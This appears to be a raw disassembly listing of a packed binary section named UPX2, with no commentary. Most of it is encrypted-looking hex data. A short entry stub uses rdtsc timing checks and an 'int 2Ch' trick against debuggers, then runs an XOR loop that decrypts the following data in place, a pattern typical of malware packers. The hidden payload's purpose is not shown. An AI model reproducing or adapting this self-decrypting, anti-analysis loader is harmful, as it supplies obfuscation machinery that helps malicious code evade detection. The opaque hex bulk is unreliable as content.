dd 0C5C50AAFh, 0E70CA632h, 199D9233h, 71BE4B27h, 0C035CE4Eh
dd 9D61D688h, 15CD1923h, 44F90A0Ah, 9015DE0Ah, 2CE5AC66h
dd 0DF8977E7h, 0A0C2D373h, 0D4D01A9Fh, 0D04C1B5h, 8ADE203h
dd 90D99E43h, 0D9B84A66h, 8E71A64Fh, 7DDE9B30h, 34C9F7BDh
dd 0F43A523Fh, 9CC96934h, 80F2BD6Ah, 84F97CC6h, 6993F744h
dd 0F279465Bh, 37424DDBh, 0D42BA537h, 92A0519Fh, 7741B652h
dd 166EDE29h, 0DB6401EBh, 0C5C785D0h, 0CD31A6BAh, 987D76CDh
dd 8A42EED3h, 3AF62CADh, 0C9B551Fh, 1CFC0720h, 0C439BEE3h
dd 9E503A8Fh, 0D86DB3D6h, 75F6F227h, 1429FE1Eh, 99023EACh
dd 0BC01BFA4h, 982D973Ah, 0C12A1E83h, 72664A5Eh, 8906C208h
dd 589DA6F6h, 0A4094E93h, 809DBEB0h, 0AF5E164Bh, 19E22A3Fh
dd 91F2019Ch, 0D025D3E9h, 281E141Eh, 0B83D3235h, 6DDB9BB8h
dd 2A1E5A5Fh, 588BF7FBh, 0A8ED6297h, 0D71114A8h, 0B30C39ADh
dd 418A3249h, 18DDC26Ah, 0E42403D8h, 9607FA3Fh, 1F45EA00h
dd 0E85D6FF2h, 0E33A3E23h, 10A5AA62h, 64AB0DDBh, 7BF538E6h
dd 1F1EE904h, 0E0EC9C5Ah, 0D04C12Bh, 48ADE203h, 90599E43h
dd 0F31D3D6Dh, 0BC58EA09h, 0E1F3A7CEh, 4702CE53h, 0F785BB17h
dd 1C15A74Eh, 680D0297h, 73FB0AE3h, 0E40D3BD7h, 756EB9E7h
dd 4BBEBECCh, 0D85B859Bh, 44E68CCEh, 49CCAF34h, 0C82DD64Bh
dd 7AC67AF0h, 0BDD7BB20h, 4C30743Ch, 0B7886887h, 1C94EE7h
dd 382713F9h, 94F3625Dh, 0E4257D87h, 9EC6417Ch, 93296004h
dd 69A61611h, 0F83DC656h, 469EE73h, 5553DBD2h, 128C3FB8h
dd 8B2D628Eh, 24C97346h, 1D22C9EFh, 0CF166FBh, 0A7F5D1ECh
dd 0F4303026h, 0D2B2B3BFh, 53A1164Bh, 6D7AE251h, 439CA52h
dd 5065EA4Fh, 4443C1EFh, 47C2CB80h, 0FA24A569h, 83951A26h
dd 548AFFE8h, 0C3FD287Ch, 0E4202806h, 0B88F33AFh, 86382548h
dd 8DFD30Fh, 0F411EDD0h, 0F90F7FF4h, 0A009D6CBh, 0A94D0273h
dd 45E03661h, 852FFA4Ch, 6C91B2F4h, 4CCCF710h, 94E96EB3h
dd 0A6A10ADFh, 2CECBB28h, 81BA277h, 0D0681BB4h, 0F005CA2Fh
dd 9804E679h, 5DAAD4B9h, 34C9FA22h, 0B1BA3Fh, 0E9AB90BEh
dd 684D76A7h, 0B0C8FB14h, 10E56A8Fh, 27E4461Bh, 0FABFB5ADh
dd 36FFAC19h, 6A1C3168h, 5683C46Ch, 3F8F3475h, 0AFFD0C30h
dd 32CAEE0Dh, 1A8C25E3h, 981D12BEh, 8F418ADCh, 0F50A8500h
dd 1CA16F79h, 1D091728h, 71C6BEE3h, 906513E1h, 0D96D93A4h
dd 75F0F227h, 1429D729h, 19370FD2h, 0EE50B6EBh, 3DD222DDh
dd 64992795h, 453DDF10h, 0B90E66BBh, 589DAB91h, 8135DB6Ch
dd 35B83AFFh, 0DCE12E05h, 0D1DF77E8h, 0FB2FFE23h, 90505EDAh
dd 0FAB4459Bh, 0B83D729Eh, 54A9C6F0h, 0AC85A1Fh, 352CF7EAh
dd 10ED22C4h, 21D85173h, 0B0851F2Fh, 4F72E6BEh, 176D2DCFh
dd 0E1C90B92h, 0FDB6FA3Fh, 9C4BD69Bh, 292B1E22h, 28B51A5Fh
dd 70B6DF7Eh, 932E4233h, 90F80718h, 6B16958Dh, 5F2AC837h
dd 0C3AF57D4h, 3CFBDA1Ah, 0E47C2651h, 1865CA6Fh, 738E19DEh
dd 9CD62B32h, 8104FE37h, 0F58271h, 3A29C640h, 6A0B7816h
dd 0ECAF5B90h, 501A6ACFh, 2CFB8290h, 0AD42E275h, 0D4699B4Bh
dd 611D1E1Ch, 0C37EAA55h, 4B6E972Bh, 0F71DAC5h, 0D8BA75D4h
dd 0B3CE59C4h, 0ECA591E6h, 9FC90ED3h, 40DAC24Eh, 0C09560Bh
dd 0EACD82D7h, 0F481BE83h, 78252A8Fh, 0EC510658h, 757DD6A5h
dd 0D965CA27h, 20AD1971h, 5461AFD7h, 882D22B7h, 54FD4A48h
dd 0F19FC1B2h, 4CC57516h, 0BDE47AC7h, 7668B16Ch, 83373ABBh
dd 0DDA7134Ch, 3A07210Dh, 0E9E6D82Ah, 0B9F55253h, 0FBh
dd 23CDh dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
nop
call loc_31518021
loc_31518006: ; CODE XREF: UPX2:31518059�j
pop ebp
retn
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31518008 proc near ; CODE XREF: UPX2:loc_31518037�p
; UPX2:3151803E�p
rdtsc
retn
sub_31518008 endp
; =============== S U B R O U T I N E =======================================
sub_3151800B proc near ; CODE XREF: UPX2:3151806B�p
push ebx
mov ecx, 0C99h
mov ebx, edx
loc_31518013: ; CODE XREF: sub_3151800B+10�j
xor [eax], dx
add edx, ebx
lea eax, [eax+2]
loop loc_31518013
pop ebx
locret_3151801E: ; CODE XREF: UPX2:3151802F�j
; UPX2:31518031�j ...
retn
sub_3151800B endp
; ---------------------------------------------------------------------------
db 0DAh
; ---------------------------------------------------------------------------
inc eax
loc_31518021: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_31518029
int 2Ch ; Internal routine for MSDOS (IRET)
jmp short loc_31518037
; ---------------------------------------------------------------------------
loc_31518029: ; CODE XREF: UPX2:31518023�j
mov dx, cs
shl ebx, 0Ah
js short locret_3151801E
jnb short locret_3151801E
cmp dh, bh
jz short locret_3151801E
loc_31518037: ; CODE XREF: UPX2:31518027�j
call sub_31518008
mov ebx, eax
call sub_31518008
neg ebx
push ebp
add eax, ebx
mov ebp, [esp+4]
sub dword ptr [esp+4], 0D006h
sub eax, 100h
jnb short loc_31518006
sub ebp, 201006h
lea eax, [ebp+201070h]
mov dx, [eax-51h]
call sub_3151800B
xor [eax+3Fh], eax
; ---------------------------------------------------------------------------
db 0DDh
dd 0E0E9CAAAh, 7AE3B442h, 4BEB4490h, 98C33F0h, 0A28C9B5h
dd 1DA012h, 592BF085h, 9BD93662h, 9425B34h, 0C39C2369h
dd 95DD2095h, 0F5225636h, 63BCB2BFh, 0C07FBABAh, 0E4BF8F8Fh
dd 0B8F875E5h, 958CAF45h, 0A30543F8h, 26A7EEC5h, 283F61A4h
dd 289063AAh, 0E02C6652h, 49AC9C63h, 0D8D11DC9h, 2C3A841Ch
dd 52AF9E21h, 85356700h, 596450A3h, 3318F233h, 0D5A901B1h
dd 40C590D2h, 0F940193Fh, 0EF17AA0Eh, 923AFF4Bh, 31B8FC56h
dd 0FC047E2Ah, 25CB90B2h, 0A602E0DAh, 1720662Ah, 405D5205h
dd 47A82F0Ch, 0C9388B8Ah, 45308F16h, 335A6A4Eh, 0DBA75D81h
dd 0D02CA698h, 0D4CFD063h, 0D374915Bh, 4060B1CDh, 55DC9622h
dd 78855B13h, 7FC7996Ah, 5BD80E4Eh, 586ACBD2h, 5F400CEDh
dd 4FA1293Bh, 0EFC801C7h, 0C4692017h, 0EBF91656h, 0C7CD19B7h
dd 81BB99BEh, 0EB4CA99Ah, 6DBDAC79h, 0EFB48DCFh, 700235FBh
dd 0DBEE24BDh, 0C4DF32D6h, 787AA6EAh, 7718235Eh, 0EDED3D9Bh
dd 7D4B39E6h, 0E9551EF9h, 81083D0Eh, 0DF96BC77h, 9E988196h
dd 3F04645h, 0C35343FEh, 5CCAFA6h, 98402FA5h, 8C7DC11Ah
dd 8B886378h, 0D02ECEAh, 70102436h, 30EE8D7Fh, 9DB8D49Eh
dd 142FFBD6h, 206DC206h, 17B4C6BAh, 11F1B7E5h, 9BFCDA25h
dd 0BCA05B3Bh, 0F5F1508Ah, 53187F2Fh, 0A22E1F57h, 5F0B424Ah
dd 0E507EC30h, 0ED7DEB57h, 0DB9CC7D8h, 23ACE2DDh, 6BFAFB7Dh
dd 0AED03BC2h, 0D06CEF92h, 9109C6D3h, 121072FAh, 3087B32Bh
dd 363CF7BBh, 0DDF01D81h, 3DA490CBh, 0BB30FA7Eh, 0C20CFD32h
dd 9EE9CB73h, 4FB47A9Ah, 0C22A3DCAh, 13DC6902h, 0C19084DEh
dd 86446C6Ah, 0A2AF84F6h, 4BC459D3h, 33608A86h, 6E3DBBAFh
dd 0CFC2E6EEh, 0C48310A3h, 0D310BBE0h, 54E411E2h, 0D4137CBEh
dd 58261772h, 0B00A7A7Fh, 6121E5D0h, 3668BCA4h, 0E29FDDB3h
dd 0E0F0B62Ch, 0C002EAAh, 0C38A35Ch, 65EC2514h, 0ABE4F288h
dd 0FCAB2836h, 0EB2883DCh, 7BC69E6Fh, 2743ADB6h, 5A6E92C7h
dd 0FD69B0DEh, 712ADA21h, 48C3B466h, 76D41C6Ch, 0C22CB8CEh
dd 0F15C3980h, 0DC3AF5B3h, 7CB4C3EAh, 0D66D3B11h, 3CAD4072h
dd 2C0EB13h, 8494BC45h, 4534261h, 2774722h, 990E284h, 4653A75h
dd 2D31AEBBh, 0EC71CCF2h, 0EF80EF8Fh, 9D3451A5h, 13E92F89h
dd 0C311DFC2h, 0F450F65Ch, 9875A733h, 33D75C51h, 21ED5BB2h
dd 1E00F429h, 9FD4A105h, 205367A1h, 45D46262h, 0A9F0E417h
dd 868EA977h, 42976C7Eh, 55D59F32h, 0CA43EE96h, 0AE340699h
dd 2F42B9B7h, 5516868h, 32B0E4D1h, 0B4446FD3h, 78FC781Eh
dd 4853892Ch, 3DED53E0h, 0BB147A77h, 0B1639DEEh, 8CD779E5h
dd 0EB5653B2h, 156F7AE8h, 63F002D4h, 4E4C842Ch, 0CC006CEAh
dd 0A0B4ED1Eh, 4268098Eh, 9E4DCB28h, 0B280029Ch, 0EFAED43Fh
dd 95BB485Eh, 8CCCFA52h, 802B13C6h, 1ADF9510h, 58621344h
dd 0B3EE9A88h, 5507296h, 0DD4E9C4Ah, 0E2777AFh, 0CAD20A4Dh
dd 3B1F2146h, 67FB5C9Fh, 65A825F3h, 0F75C130Fh, 0E1A92816h
dd 61C4A9EDh, 0EDDDD871h, 0CE3CADBFh, 0BA65A206h, 0E9490A9h
dd 70DDBF8Eh, 0A6FC943Bh, 5CA2A029h, 0EE8CB7AAh, 3618393Eh
dd 8EA7D59Dh, 14F26CD6h, 9A58D72Ch, 0E1BE2569h, 43F9B4AEh
dd 11AF1376h, 624EC84h, 0AE0AC357h, 5D3CC8B2h, 744A6A2Ch
dd 26B65E05h, 4E0D4D8Eh, 8603BA3Dh, 0C7A6537Ch, 12CE0641h
dd 9549BC2Ch, 725FD632h, 0EDA232A2h, 730689FDh, 0F9443238h
dd 4BDCB865h, 0B622CB49h, 0E5CFE04Ah, 0F2AE3448h, 0B153B484h
dd 0A6404FCCh, 7F0423B9h, 806AFD11h, 2B16EA82h, 38CF6E3Ch
dd 2EC4C7D0h, 0B0994707h, 0D3676672h, 0E0247FAFh, 17210B8Dh
dd 846856A4h, 83B97BB4h, 0BAD059DCh, 0A97BACFEh, 0BE185778h
dd 63983F97h, 0C55E0380h, 37ABEC08h, 0C5628C0Ah, 0D3432F88h
dd 0C850AD88h, 9650C9CFh, 0CF0F626Dh, 84BF0CB2h, 0F6706DF7h
dd 70DEAA9Fh, 5380E4CEh, 544C6F43h, 8644C536h, 79447BCh
dd 0BED67CDh, 0DE2C3A7Bh, 0D394C5C6h, 56B06945h, 0CAF21AE1h
dd 0EA142102h, 0B04F5D2Bh, 4CC6B175h, 7FF3A61Eh, 69E4E373h
dd 15D7A9A6h, 4C1D89CFh, 4F7D520Eh, 869C0EEBh, 0EAF4B70h
dd 7304322Ah, 3D8BE9DEh, 273D64C3h, 0FC20B62Eh, 2810B3FAh
dd 7084D0FEh, 2BFF6EA6h, 0FEA4C873h, 7F5BDF22h, 19CD4C81h
dd 0D60C6327h, 0FA9095B7h, 0A75DE00Fh, 29EC4B4Eh, 8A95C7C1h
dd 0CC893EEh, 8E44534Ah, 0FF8DF20h, 91AC50D3h, 1360D286h
dd 9514543Ah, 0E99B83BFh, 0B855F937h, 0B6697256h, 60919B8Eh
dd 415B325Ch, 0FA3F3F30h, 446D8168h, 0C8D62EBEh, 571C80EBh
dd 0C579361Eh, 55B9B082h, 0C5841DDEh, 484A9E2Dh, 0C0EC1873h
dd 42D299B5h, 0F354011Fh, 4669945Ch, 0DFD53487h, 7670B5F3h
dd 0C3451338h, 54B1B19Bh, 0CAED34D7h, 5B2E9216h, 0CFB77D5Bh
dd 5ADC9FABh, 0A233F2D2h, 2637153h, 0A1B6C0EAh, 141D71FFh
dd 0BC43EA37h, 3B885D63h, 0CBF0EBDFh, 2C2D7E2Dh, 0A6A8EB56h
dd 34D16AA4h, 0B716D28Ah, 7D675Fh, 0BDA0FB9Dh, 64F07AC3h
dd 0B85ACB68h, 3580697Eh, 0A4D99BB6h, 3604691Fh, 8465FA58h
dd 15DD67DEh, 8600CBD4h, 17545007h, 92A1C793h, 68C954CBh
dd 0AC48CC25h, 3895477Fh, 0EDC1D6A3h, 292C4B39h, 0A569DC5Bh
dd 72A55C8Fh, 0B900D6DDh, 1A5D5121h, 9BB5F167h, 14F176D3h
dd 0BC44FB0Fh, 13B5487Bh, 9BC0C8B6h, 0E40E5ECEh, 255A456h
dd 0D0BC27A9h, 6008B7DBh, 0F559023Bh, 6790AB6Fh, 8AD930CCh
dd 5838AE35h, 0C8702043h, 41D1A2B3h, 0D00D3DEFh, 67799542h
dd 0E4BD36A2h, 7EF0B4FAh, 0FD7F571Fh, 6B898F66h, 0F5CF33B5h
dd 69319B7Ah, 0EC7A3B78h, 65D2B08Bh, 0E57020EEh, 4B72972Fh
dd 0C0B51192h, 48EA88FBh, 0DD210514h, 6B9A8573h, 0C3C42CCEh
dd 6F308CE0h, 0D37F035Ah, 50ABBCEAh, 0D1113EFAh, 4C5E9520h
dd 0D7AD7647h, 5DFDA1CAh, 0FC2E3619h, 3B99974Bh, 0D3D50C99h
dd 5A0897CCh, 0B168E173h, 3AB6F9Bh, 0A1F0CCA6h, 29465534h
dd 0B49BE26Dh, 26EE58C2h, 0B823EF15h, 24423E19h, 0CECCFEACh
dd 33037DC2h, 0E153E223h, 2BB15CC8h, 0B0DA94DAh, 3E7A7203h
dd 8BF0FD7Ah, 33E26DAFh, 0A819FE12h, 3C656F46h, 0ACA5EA93h
dd 42720DBh, 8F41E43Ah, 0DB37467h, 94F5D1D8h, 1C21746Ah
dd 8C94C058h, 0EC14386h, 880CFF86h, 3A145E5Fh, 80A9C280h
dd 51958F4h, 9D76D519h, 23E45066h, 82ECC4D7h, 150D5413h
dd 0FB63D54Ah, 8DD498Dh, 9201FBEBh, 0F4523F27h, 74BAA4B7h
dd 0F1D436D9h, 6951B237h, 0F5892177h, 6DCBA892h, 0FE1A4914h
dd 6D6DB96Dh, 0E4FA2996h, 4170ABFAh, 0F456133Eh, 42BDA59Fh
dd 0F1EF3CC0h, 5840A615h, 0F286146Eh, 49CDACAFh, 0FE3F35F0h
dd 6555AF45h, 0DDB013EAh, 5419BAECh, 0C1493237h, 4D8F8A72h
dd 0E8E02ABAh, 4E1E960Fh, 0CEB31F47h, 5ED38C85h, 0AC0A04E3h
dd 5E579970h, 0DD9C0097h, 42E593C9h, 0D85B2629h, 7AE89A6Bh
dd 0D3EC3AB6h, 5B35A418h, 0D46B105Eh, 6BCCB4DEh, 0D81813E0h
dd 56768A25h, 0A1A10B88h, 2FED4CC2h, 0C445F10Dh, 30A17158h
dd 94DDF4AFh, 2C2C7B07h, 0AD62C35Fh, 2DAD7989h, 0A01BE4EEh
dd 75C414Eh, 0B4A8F870h, 27E27BE0h, 9828F51Fh, 24977B7Bh
dd 0ACFE97ABh, 330E4CEAh, 0B970F459h, 34BA68BDh, 0B028F9CCh
dd 8434E17h, 8B96D659h, 339844D0h, 921FE421h, 1D745547h
dd 85D7A8AAh
dd 180D59E1h, 8877CF2Dh, 1B32D82h, 93E1C1C4h, 175F312Ah
dd 8083DB66h, 1BD956B2h, 0F731DB1Bh, 0F6B5D5Ch, 94D9CAE2h
dd 13033BF2h, 8A41D629h, 0BB677FEh, 64E2B2D7h, 0EC2C0112h
dd 65BCA169h, 0E3C421A0h, 7C328E82h, 0EF7E3B53h, 7FA18D9Eh
dd 0E31623DDh, 6A58AD37h, 0F1940362h, 5B94B4CEh, 0E62D2700h
dd 5A88B04Ch, 0D6DE33A6h, 6D0A918Ah, 0FE76285Bh, 79BC9486h
dd 0F2F208C8h, 4E7DDF1Bh, 0CF9A047Ah, 46CE96A7h, 0CC160017h
dd 66048346h, 0F8F9319Ah, 45EDADBh, 0AC6C2702h, 6EB389A8h
dd 0CAFB01C2h, 31459529h, 0FD971744h, 7FCA96BAh, 0CE1D0C1Bh
dd 5D5EF773h, 0DCB52981h, 5A2283E8h, 0F84D0922h, 6CDCBF7Ah
dd 0A5C318D3h, 2E25571Eh, 0BBBDE66Bh, 0AC2F0493h, 96A8AD83h
dd 49140852h, 0EE840406h, 267C61A1h, 9D60DC53h, 836F0A60h
dd 814C1BEEh, 20C7826h, 40FFC774h, 56943FB0h, 2764530Dh
dd 7A366BD7h, 0D31419F6h, 0D8094B69h, 0DF188B27h, 0ABCDF21h
dd 1DAECBC6h, 447E39EFh, 92C8202Eh, 47D4769Dh, 6270A8C8h
dd 0E024409Eh, 8498C132h, 6E9C2DB2h, 9A12AD0Ch, 2FD4591Ah
dd 0F3C2B2CEh, 8A0C67D3h, 0D73AE8A3h, 879D68EAh, 0DA511B0Bh
dd 8D3BE52h, 0AD6D364Dh, 9C941EAFh, 1DD4D62h, 81FC6232h
dd 0FBE39407h, 0C8E1CE58h, 8518E714h, 89D55C7Dh, 0F4D822A6h
dd 8BFB3A5h, 0EC8E45Ch, 89FDC04Fh, 55B8D176h, 1FFBACD5h
dd 3592825Bh, 0E3ACD392h, 77AF554Dh, 72D459E3h, 0E377249Ch
dd 5D639AE9h, 1FF03743h, 20F960CAh, 342C093h, 28C55732h
dd 6E09963h, 0F920369Ah, 7B79B91Fh, 820AFEFDh, 2917EC96h
dd 0DD1914Eh, 6DF8D037h, 0E7AC7510h, 3460F36Eh, 5B95283Ah
dd 37E8ECBFh, 2CF187C8h, 3B10E04Ah, 9C292E5Ah, 3EB2FD9Ah
dd 0A640BBF1h, 586284E1h, 0E37982FAh, 5F0C8149h, 0C7388662h
dd 8B8D07DCh, 0CBEE88C0h, 3FC738A1h, 48F97216h, 27507A06h
dd 0D1549071h, 5053C2A5h, 6131AFB2h, 56500F16h, 0D9282DC1h
dd 0D35318FEh, 0DB8C9BBAh, 966BE465h, 2D3F157Ah, 65DC7E68h
dd 9A943C5h, 6BD7A0F4h, 0B6102FBDh, 3328EA15h, 0BB7DE838h
dd 0FF1FD56Ch, 0ECB481D0h, 0E544E9EDh, 0CFD571B7h, 0F2671BD6h
dd 0F4A3B560h, 75F03454h, 35CFE27Bh, 5244A2CFh, 7E31B97Ah
dd 0BBDB3306h, 74860C80h, 5F7AFAE3h, 8CE6372Ah, 7C12209Ch
dd 0C78DB65Bh, 8620AD13h, 8689C6FAh, 0A9935A43h, 0C3A14162h
dd 0FF06C3Ch, 0EACE9B6h, 90E1CB71h, 0FE8DD132h, 93C050EEh
dd 1470BCCEh, 2D7564Eh, 18FCF1FCh, 1E1DA53Dh, 1C45DF4Eh
dd 9D920D1Eh, 1FACDA3Ah, 0F5323686h, 0B6EBB53Ah, 0A4E84A14h
dd 0B1F12C91h, 0A8306652h, 2B8EB85Bh, 0C39900EFh, 6D4CEC72h
dd 69959174h, 0A6B4CFF3h, 0E91C870Bh, 3074A712h, 0E2D074F7h
dd 17A04255h, 4638785Ch, 1AC65C87h, 7C2522C6h, 2AB7EB0Eh
dd 0AADCF47Eh, 16ED52E2h, 85E57DC0h, 1C242460h, 16AD457Bh
dd 0EA19F8E4h, 4740A94Fh, 1CA64F4Dh, 40F0C8A4h, 4F5D0A15h
dd 11233B36h, 0A19D0180h, 8428C335h, 67C4502h, 19756854h
dd 0D8943893h, 0DB4A92AAh, 7888E322h, 482562DEh, 33643FA0h
dd 0C88E34C1h, 0A19122D2h, 0DB00A4A2h, 21355350h, 0FDA42585h
dd 737F29E2h, 0FC503EFBh, 0BF072D0Ah, 6B6A5188h, 8EE43F52h
dd 0FC20B246h, 74D4C37Eh, 0CCB635AEh, 0F87A2717h, 7DFFB928h
dd 7BA43A2Bh, 887882FEh, 418D78C3h, 478EF6B6h, 4DFF63EFh
dd 4B298588h, 0EF8D8B29h, 54C697B6h, 0A3CADD95h, 31A1CA3Eh
dd 33294413h, 0E760CD86h, 90144F8Bh, 4398EE6Fh, 167304EBh
dd 1530D4F3h, 3AEC9089h, 9C97DA82h, 9A4C59EBh, 0EF75FB1Ah
dd 928E6076h, 1F68520Bh, 8111CD42h, 1FF0C1D6h, 0D0E1048Bh
dd 1A949A2Bh, 26901232h, 418017B8h, 0DA211E0Eh, 5D0B92AFh
dd 0DB9342D8h, 0CF3729FEh, 8157E4Ah, 33D8D5EEh, 4ADE9645h
dd 176ACCF3h, 0E8344B1Ah, 0D2F8A99Eh, 0BC5C7B8Bh, 50679272h
dd 0DBA51186h, 0DFEDFF9Eh, 462CA278h, 77D670C6h, 0E110C73h
dd 19482744h, 0C9FF894Ah, 1DE15B52h, 6FF173DAh, 0C2182E14h
dd 0F0D78367h, 9BB341A6h, 8664C20Eh, 0C017445Fh, 0D7BCBF14h
dd 0A6741CF1h, 0FB2D38BFh, 0DC7BE3DEh, 0FE79A21Fh, 0A3D91E46h
dd 0E5F0FC71h, 63882246h, 8BDF962h, 66D03B0Fh, 0C6B41A41h
dd 0DFD3295Eh, 0EC2C852Ah, 0E04BD7E5h, 0EF54808Eh, 0F4A395BDh
dd 0F2FC9C12h, 5A9CA63Dh, 7347B54Ah, 77D8191Ah, 71C4BA5Bh
dd 84603A95h, 0DD3E86AFh, 2201D6EEh, 690ADAE6h, 0D26C2435h
dd 6A97BA62h, 0C8F425DDh, 7523AB17h, 5B33485Fh, 0FCE60651h
dd 6DEB1957h, 0D5CA741h, 0E582190Fh, 46315DB2h, 2A387243h
dd 14ECD405h, 68ED514Bh, 7EAB2885h, 0D70CD485h, 1BBCDAE2h
dd 0DAFDF7F0h, 0FB16754Eh, 42733952h, 22196C49h, 0F0404348h
dd 0DAA6E370h, 8782005Bh, 0D286382h, 0B3D4E93Eh, 0A9CB2B6Fh
dd 0AE786C3Bh, 1044EF38h, 0E7E07107h, 0A66BF9D0h, 0B5685E00h
dd 0BDF0A8A9h, 25396798h, 3A44D78Eh, 9210F6B7h, 0DE4DFCD2h
dd 0B07F8EA6h, 415E530Bh, 77178464h, 44BC2DC2h, 0EC461089h
dd 0B754070Ah, 0E996886Bh, 0E9F9F592h, 9520AC6Fh, 4147CD7Fh
dd 0D089DB2Ah, 69BD7762h, 0DF84C95Bh, 6B31EB99h, 3E58B654h
dd 590C1973h, 0DA08276Bh, 0EB7B1B9Ah, 0AAA58300h, 5BB40033h
dd 0B690A0B7h, 4AB2B795h, 0B3AEA43Eh, 4F12B02Dh, 0ABEBA7A6h
dd 0E1D72A06h, 38CBD2BEh, 0E65C5E29h, 0DBBDB61Ch, 73496139h
dd 0F3E0307Dh, 6296017h, 4E2B052h, 5E19DD83h, 8BE39C82h
dd 881F6366h, 0F3CCE97Dh, 7DCA391Dh, 820C348Dh, 0CF67B211h
dd 0F154BCEh, 0E546454h, 3BDFD18h, 0FABC67CCh, 0EC5E215h
dd 0B7246B64h, 2DF6C44Bh, 0FE0F41B2h, 22BF2F99h, 8241DBDAh
dd 9DA8F3E0h, 0B672410Fh, 72408736h, 98AE08E9h, 1B78DAF6h
dd 18D30BD2h, 1EC0CB4Eh, 8952CA45h, 0AFB7E14Eh, 0A3DC766Ah
dd 2A4F1C55h, 589B5D0Eh, 299D61C1h, 0C0CC49DCh, 7A8081A6h
dd 9CA1920Ah, 0A4E8CF24h, 91B26447h, 31B03376h, 0B56E247Ah
dd 1CB66021h, 3DE577B2h, 3A00D75Eh, 0BBBEAE71h, 6DBA03FCh
dd 913CCB9Dh, 0D50F0036h, 0C284ABE0h, 6A5886F5h, 0C2858512h
dd 0E555F9C2h, 4274A8B3h, 0FEA3361Dh, 0CCFCA21Ah, 7A8A593Dh
dd 456F71E1h, 51D83F1Ah, 0FDB81F59h, 7ECD14A6h, 2DF63DF8h
dd 45D89263h, 8B2D9982h, 0D614B05h, 0F43208F5h, 0A0C81E9Eh
dd 0C16502E7h, 1025E126h, 818E89E0h, 0A0A44E0h, 0A826C327h
dd 5B54085h, 0C5B699C6h, 4154403Ah, 0BDEC9F3Fh, 35F47C9Fh
dd 8717ED37h, 1A6D415Ch, 9BD3F796h, 1B1F44E2h, 0A550DD19h
dd 0CAA5CADh, 8FE9D8DBh, 1F286E3Ah, 0BE90DA68h, 0F2CD23ADh
dd 620C9EF1h, 0E07D2544h, 75B6A09Eh, 0FA1101C2h, 664DBE37h
dd 0E78F1B6Ah, 51EDAFD3h, 0E1293A3Dh, 748EB146h, 0F4DF2386h
dd 4801BFE3h, 0FE6C207Fh, 6DA5A49Dh, 0E9C13CC3h, 785DB62Ah
dd 0F381286Fh, 52C0AEACh, 0A0242C1Fh, 7642AE79h, 0E6EA2389h
dd 4605A9CEh, 0C8530934h, 7F88939Ch, 0C5EC07C7h, 6F609815h
dd 0C8821F63h, 4AF29AA4h, 0DE31030Ch, 4B49AE5Ch, 0C6AF1F96h
dd 627487FFh, 0DD4F052Fh, 4AB3B176h, 0BB927AC2h, 3D44AC6Ah
dd 0CC887E1Eh, 2DC587BDh, 0A914EFA8h, 34786D48h, 0ABA1AA8Fh
dd 97C69C4h, 0E97BCB1Fh, 2E86797Ch, 0A8F4ECC6h, 0B1F5878h
dd 9A65AF74h, 71FA5995h
dd 0A101E4A8h, 5F2F6136h, 0D6D07DA3h, 0D9D917AAh, 0FA181BB3h
dd 6469DD12h, 0DDA0BCD3h, 75568B85h, 9C9A00Eh, 88055FDh
dd 52C52888h, 3F240563h, 92F69A52h, 570D4E98h, 0C835B799h
dd 464A9197h, 9823ADEEh, 16F97880h, 18953C93h, 0FCC412C2h
dd 0D551A41Bh, 31A5CC52h, 6AE34FCh, 98958841h, 711450A1h
dd 5DE944A7h, 0FFDAEED6h, 149B4EE0h, 338E824h, 8CE83F71h
dd 0EEC4B0A2h, 88344752h, 27AB8F5Dh, 8BD00686h, 24A25989h
dd 4F0F4E0Ah, 7A2BDDAAh, 7930290h, 1400FAE8h, 7D478405h
dd 0E8772FDDh, 993C538Ah, 59B68916h, 0B2F71495h, 1E14913Ah
dd 89FECACDh, 7928E0C6h, 4B8B9D63h, 2528E445h, 0F4993557h
dd 6CBED585h, 55442526h, 0BD2F98Bh, 0ADA684D2h, 5C17EE86h
dd 0DF7D024Ah, 3289979Ah, 1AE98CF2h, 0BF30D57Fh, 97CDCD8Fh
dd 0B4A9F7BEh, 9B5579FFh, 0F9857526h, 0EFB45DF0h, 6A7A6A71h
dd 0AA8F8162h, 43D002F2h, 0DC943127h, 0CA61067Eh, 0E8C622AFh
dd 0B962E1C6h, 0B327485h, 6E284DABh, 4CEC8EE2h, 71505233h
dd 46A9924Ah, 54F833FEh, 0D7E6C1E2h, 3012170Ch, 59F49918h
dd 71068F31h, 1DD99CA2h, 0D2326B6Ch, 0C0E4AC67h, 6412739Eh
dd 0C46C16DFh, 33B42526h, 0B5C5F6EAh, 43FABD91h, 15A4AA02h
dd 4C9A8143h, 25E16B8Ah, 70180F12h, 0E3F831Ah, 180DCD59h
dd 32349448h, 56FD2D8Bh, 0A7C8E1C2h, 894ED145h, 79C344D5h
dd 7D9829C5h, 0CB33EAC4h, 7ED34FAEh, 19510605h, 0D28863BBh
dd 0EE089A1Ah, 780FB416h, 1CBF4D0Dh, 0EE0E4A5Eh, 0C43F9844h
dd 0A0DCC86Bh, 4125CFBAh, 0C378001Fh, 86238253h, 95B07EBCh
dd 3D464395h, 7039583Eh, 0F2D8ACCDh, 9C605B8Ah, 49589569h
dd 0B1810EAFh, 2130ACE6h, 8922F7A9h, 280CE42Ah, 0F59865BEh
dd 5C29B43Ah, 0DF6C0870h, 7BB4ABBFh, 84C6F971h, 0A28FEE62h
dd 90FAA343h, 324C99AAh, 0DE6E735Eh, 0DB790A12h, 3AA056EFh
dd 194B96EFh, 2FB5F72Eh, 6ABCDBC9h, 2B8F2AC4h, 4004D6F0h
dd 4CD4447Dh, 63938927h, 0AF17D466h, 2EA6501Bh, 48A887CCh
dd 0E5B4DA7Dh, 4FEF74CCh, 6DD10D57h, 0C40C8E9Eh, 513F983Ah
dd 0E8756D06h, 0BC943390h, 0D6489562h, 14B34475h, 0F782AB9Dh
dd 5B2856CEh, 0F70A09C1h, 365F1DD2h, 0E0809FA1h, 7A5394D7h
dd 6EB1A32Eh, 45B65E7Fh, 15024E76h, 65ECD7D5h, 0BDB8A9DEh
dd 222565DBh, 0AA0EF903h, 90D462B6h, 0D1A2A23Bh, 7CFCB762h
dd 0F4F28192h, 73CCA6CAh, 7558B77Eh, 5A149C87h, 464DE3E6h
dd 7D54160Ch, 0DAA5A6h, 1A61C3FDh, 290E19Ch, 8654C765h
dd 0E979C51Eh, 87AC4742h, 861A0D2h, 1EEB4A3Ah, 0CE8E194h
